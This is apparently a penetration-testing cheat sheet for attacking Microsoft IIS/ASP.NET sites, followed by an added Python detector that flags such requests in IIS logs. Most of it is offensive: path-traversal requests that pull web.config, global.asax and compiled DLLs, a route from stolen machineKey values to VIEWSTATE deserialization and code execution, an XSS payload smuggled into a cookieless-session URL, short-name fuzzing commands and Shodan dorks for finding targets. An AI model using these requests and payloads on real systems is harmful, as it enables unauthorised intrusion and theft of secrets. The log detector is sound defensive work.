Hacking IIS Applications
https://youtu.be/XlmeSFm3RT4?si=hfhzGF9ymG6Igt5j
https://www.youtube.com/watch?v=cqM-MdPkaWo
https://www.youtube.com/watch?v=yyD8Z5Qar5I
https://www.youtube.com/watch?v=_4W0WXUatiw
Got HTTPAPI ERROR 404
It is an IP, but you can get the subdomain from the certificate's common name.
Edit the Host header.
Came across a subdomain running an IIS server: apply.company.com
VHost enumeration using ffuf or Burp Intruder
Found mssql.company.com
Running MSSQL Explorer/Manager
DownloadCategoryExcel?fileName=../../web.config
DownloadCategoryExcel?fileName=../../global.asax
<add namespace="Company.Web.Api" />
DownloadCategoryExcel?fileName=../../bin/Company.Web.Api.dll
Obtain the machineKey from web.config (validationKey and decryptionKey)
VIEWSTATE -> Insecure Deserialization -> RCE
Try in login pages, redirects, forms & dynamic URL construction (~/images/). Payload: /(A(%22onerror='alert%60123%60'test))/
Found leaked zip files containing DLL files?
Use dnSpy to decompile them back to source code.
ffuf -w iis.txt -u https://example.com/FUZZ
ffuf -w iis.txt -u https://example.com/shortnameFUZZ
shortscan https://apply.company.com/
IIS Short Name Scanner (latest version on GitHub)
Got part of a file name but not the full name? Let's fuzz the rest.
LIDSDI -> LIDFUZZ | EASYFI -> EASYFUZZ
ffuf -w wordlist.txt -D -e asp,aspx,ashx,asmx -t 100 -c -u https://apply.company.com/lidsFUZZ
You can make your own wordlist using a wordlist generator: https://sourceforge.net/projects/crunch-wordlist/ https://github.com/jim3ma/crunch
./crunch 0 3 abcdefghijklmnopqrstuvwxyz0123456789 -o 3char.txt
Fuzzing doesn't work? Try searching on GitHub or use https://github.com/retkoussa/gsnw
Check out the Nuclei templates for fuzzing techniques.
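The traversal, short-name (`~1`) and cookieless-session requests above all leave a recognisable trace in IIS W3C logs. The following is an added example, not part of the original notes: a small Python detector run over constructed log lines. The abridged field layout and the regexes are assumptions; real IIS logs declare their columns in a `#Fields:` header, so adapt the split to your configuration.

```python
import re
from urllib.parse import unquote

# Constructed sample in (abridged) IIS W3C extended format:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2024-01-01 10:00:01 203.0.113.5 GET /index.aspx - 200
2024-01-01 10:00:02 203.0.113.5 GET /DownloadCategoryExcel fileName=../../web.config 200
2024-01-01 10:00:03 203.0.113.5 GET /a*~1*/.aspx - 404
2024-01-01 10:00:04 203.0.113.5 GET /lids*~1*/.aspx - 400
2024-01-01 10:00:05 198.51.100.9 GET /(A(%22onerror='alert%60123%60'test))/login.aspx - 200
2024-01-01 10:00:06 198.51.100.9 GET /(S(k3j4h5))/default.aspx - 200
2024-01-01 10:00:07 198.51.100.9 GET /bin/Company.Web.Api.dll - 404
"""

# Each rule is applied to the URL-decoded "stem?query" string.
RULES = {
    "short-name probe": re.compile(r"~\d"),                      # 8.3 tilde syntax, e.g. /lids*~1*/
    "path traversal": re.compile(r"(?:\.\./|\.\.\\)"),           # ../ or ..\ in stem or query
    "sensitive file": re.compile(r"(?:web\.config|global\.asax|/bin/[^/?]+\.dll)(?:$|\?)", re.I),
}
# Cookieless-session segment /(X(...))/: a genuine ID is alphanumeric, anything else is suspect.
SESSION_SEG = re.compile(r"/\([A-Z]\(([^)]*)\)\)/")

def classify(stem: str, query: str) -> list[str]:
    """Return the label of every rule the decoded request trips."""
    url = unquote(stem) + ("?" + unquote(query) if query != "-" else "")
    hits = [label for label, rx in RULES.items() if rx.search(url)]
    m = SESSION_SEG.search(url)
    if m and not re.fullmatch(r"[A-Za-z0-9_-]*", m.group(1)):
        hits.append("cookieless-session injection")
    return hits

def analyze(log_text: str) -> list[tuple[str, str, str]]:
    """Return (client ip, label, raw uri) for each suspicious request; skips blank/comment lines."""
    findings = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        _date, _time, ip, _method, stem, query, _status = line.split(" ", 6)
        for label in classify(stem, query):
            findings.append((ip, label, stem if query == "-" else f"{stem}?{query}"))
    return findings

if __name__ == "__main__":
    for ip, label, uri in analyze(SAMPLE_LOG):
        print(f"{ip:<14} {label:<30} {uri}")
```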
Utilize Shodan to identify IIS instances with specific characteristics:
http.title:"IIS"
ssl:"Company Inc." http.title:"IIS"
ssl.cert.subject.cn:"company.in" http.title:"IIS"
ASP.NET fingerprints (cookie names, response headers, HTML and URL patterns):
ASP.NET_SessionId
ASPSESSION
X-AspNet-Version: (.*)\;version:\1
X-Powered-By: ^ASP\.NET
<input[^>]+name="__VIEWSTATE
\.aspx?(?:$|\?)
Exclude these directories from your scans:
ASPNET~1
DEFAULT~1.ASP
DEFAULT~1.CSS
GLOBAL.ASA
GLOBAL.ASP
GLOBAL.CS
MASTER.CS
WEB.CON
Bruteforce file extensions to uncover vulnerabilities:
.asp (legacy Active Server Pages)
.aspx (modern Active Server Pages, ASP.NET)
.ashx (APIs/AJAX handlers)
.wsdl (Web Services Description Language)
.wadl (Web Application Description Language)
.asmx (XML Web Services)
.xml
.zip
.txt
naabu -host iis.target.com